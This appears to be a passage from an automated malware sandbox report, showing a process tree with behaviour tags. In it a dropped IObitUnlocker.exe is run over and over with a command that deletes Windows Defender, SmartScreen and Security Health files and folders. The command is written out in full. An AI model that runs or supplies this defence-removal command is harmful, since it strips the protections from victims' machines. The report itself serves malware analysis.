- Suspicious use of SetWindowsHookEx
PID:1472
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:556
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5848
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4776
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:3992
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:4328
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:3640
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:5344
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:5332
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:3736
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:5004
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵PID:5616
-
-
